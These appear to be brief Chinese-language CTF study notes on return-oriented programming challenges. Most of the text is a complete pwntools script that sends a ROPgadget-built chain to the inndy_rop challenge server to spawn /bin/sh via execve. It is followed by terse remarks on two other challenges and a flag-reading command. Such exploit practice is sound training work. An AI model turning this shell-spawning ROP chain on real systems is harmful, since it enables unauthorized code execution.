inndy_rop
简单利用ROPgadget
https://www.cnblogs.com/bhxdn/p/12347296.html
可以看到有很多字符串,很多函数,这不正常(原因是这个文件是静态编译的,他的函数不是来自于调用libc库)
这个是我们就可以使用工具ROPgadget,凡是这种静态编译的都可以用工具自行生成ROPchain(ROP链)
然后我们把他自动生成的脚本加上pwntools的东西就可以了
from pwn import *
from struct import pack
#io = process('./rop')
io = remote('hackme.inndy.tw',7704)
# Padding goes here
p = 'a'*0xc + 'aaaa'
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80
io.sendline(p)
io.interactive()
jarvisoj_level2_x64
https://blog.csdn.net/michaelinfinity/article/details/88584349
看main函数,没东西,点进vulun函数
看到了system和一个read漏洞,问题是这个system里面不是command了,而是一串字符串,那么我们之前的利用查看十六进制办法应该也管用,但是在这里我们使用另外一种方法
[HarekazeCTF2019]baby_rop
需要注意这道题的flag不在当前目录下,所以要用下面这个命令
cat ./home/babyrop/flag
https://blog.csdn.net/qinying001/article/details/104294784?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task